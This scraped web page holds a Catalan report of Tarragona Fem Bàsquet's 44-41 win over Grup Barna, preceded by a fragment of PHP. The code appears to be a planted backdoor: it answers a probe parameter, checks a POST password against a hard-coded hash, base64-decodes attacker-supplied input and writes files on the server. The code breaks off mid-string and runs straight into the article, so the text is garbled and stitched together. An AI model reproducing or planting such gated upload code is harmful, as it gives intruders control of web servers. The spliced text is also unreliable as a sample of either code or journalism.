function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet suma un triomf decisiu per a la permanència contra el Grup Barna (44-41) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet suma un triomf decisiu per a la permanència contra el Grup Barna (44-41)

Updated: abril 9, 2017

Sang, suor i llàgrimes… d’alegria. El Tarragona Fem Bàsquet ha aconseguit una victòria que val el seu pes en or després de derrotar aquest vespre el Grup Barna. El conjunt lila suma així el quart triomf consecutiu i continua depenent d’ell mateix per a certificar la permanència directa. Les tarragonines han de visitar la setmana que ve el líder, l’Hospitalet, però si guanyen el Safa Claror i el Tordera —pràcticament descendits— en les dues últimes jornades, s’assegurarien molt probablement la permanència, perquè els seus rivals directes juguen entre ells en les darreres jornades.

El matx ha estat molt emocionant, duríssim. El Grup Barna arribava al pavelló del Sagrat Cor amb un balanç de cinc victòries en sis jornades en aquesta segona fase i en la primera volta havia guanyat el Tarragona Fem Bàsquet (46-44). El partit s’ha disputat en uns dies molt importants per al TGN Bàsquet, enmig del Torneig Internacional que organitza a Cambrils i això fa que la majoria dels components de l’entitat estiguin en aquesta localitat costanera, un fet que ha provocat que el matx s’hagi disputat en un dia i horari no habitual pels partits de casa. Amb tot, les graderies del Sagrat Cor han estat plenes i l’afició ha respost a la crida del tècnic Albert del Rey en un partit de tanta trascendència.

Així, el Grup Barna ha plantejat una defensa en zona durant tot el partit que ha creat molts maldecaps a les locals. El Tarragona Fem Bàsquet ha entrenat l’atac contra aquest tipus de sistema defensiu i en les últimes jornades se n’havia sortit molt bé. Amb tot, les barcelonines han ajustat molt bé la seva defensa, tancant bé els espais, arribant a les ajudes i, a sobre, les locals no han tingut el millor dia pel que fa a inspiració ofensiva. Les lila han fet una pobra estadística de 2/16 triples i han perdut 20 pilotes. Això sense comptar la gran quantitat de tirs prop del cèrcol que han fallat (16/40 en tirs de dos).

L’altra de les claus per explicar el patiment i l’equilibri en el resultat són les faltes personals i els tirs lliures. El Grup Barna ha llençat 26 tirs lliures (anotant-ne 13) i el Tarragona Fem Bàsquet 14. La banqueta local i el públic han protestat molt l’actuació arbitral considerant que no aplicaven el mateix criteri pels dos equips —al quart període, a falta de poc més d’un minut i mig pel final del partit, el comptador de faltes era 6-1, per exemple—.

En l’inici les accions de Laura Pascual i també de Claudia Pérez han permès les locals dur la iniciativa (6-3). Amb tot, els punts han arribat amb comptagotes, cada cistella costava un món i el primer període s’ha tancat amb un escarransit 7-8.

La dinàmica de poca anotació, molta defensa i moltes pèrdues de pilota ha continuat en el segon quart. Només uns minuts d’inspiració de Núria Vilamajor amb un triple i una assistència sublim a Laura Tierno —mirant cap a una altra banda— han fet pensar que el Tarragona Fem Bàsquet havia trobat el camí de la cistella (14-10 a 7:28 del descans). Però ha estat un miratge. El Grup Barna, que ha demostrat un ofici enorme, no s’ha posat nerviós, ha seguit el guió marcat pel seu tècnic i ha arribat al descans un punt per sobre, 21-22.

El partit feia mala pinta. El ritme era visitant, que havia col·lapsat l’atac lila i els nervis ja es deixaven notar entre les files del Tarragona Fem Bàsquet, conscients de la importància del partit. Com en el segon quart, una cistella de Fort —colossal novament—, un triple de Romeu i una cistella de Pérez obrien una escletxa que feia albirar esperances (29-23 a 4:21 pel final del tercer quart). Però el Grup Barna ha demanat temps mort i des d’aleshores ha fet un parcial de 6-13 —amb triple final— que ha provocat que el tercer quart acabés amb un resultat de 35-36.

El neguit al Sagrat Cor era evident. Els nervis estaven a flor de pell i tot es protestava. El tàndem Fort i Romeu han estat el bastió del conjunt lila. Les dues s’han carregat l’equip a les espatlles en minuts de molta incertesa i de poca clarividència ofensiva i, a còpia de força i decisió han mantingut vives les locals (43-39 a 4:03 del final). Cal fer menció especial a Laura Tierno també. Sortint des de la banqueta, ha dirigit amb molt criteri el Tarragona Fem Bàsquet, triant sempre la millor opció. El seu concurs ha estat vital per un equip que no sabia ben bé com trencar la teranyina visitant i això ha donat confiança a les seves companyes.

La línia de tirs lliures ha estat la millor aliada dels dos conjunts en un tram final sense idees o encert ofensiu. El Tarragona Fem Bàsquet ha defensat amb ungles i dents —ha estat penalitzat amb faltes, clar— i el partit ha entrat en una fase en què cada punt era or. Des de l’última cistella de Romeu (43-39), el parcial ha estat d’1 a 2, i tots des de la línia de personal. Vadillo ha fet el 44-41 a 36 segons del final i una gran defensa i una decisió incomprensible del Grup Barna, que no ha fet falta en l’última possessió de les locals, quan faltaven 26 segons, ha provocat la victòria lila.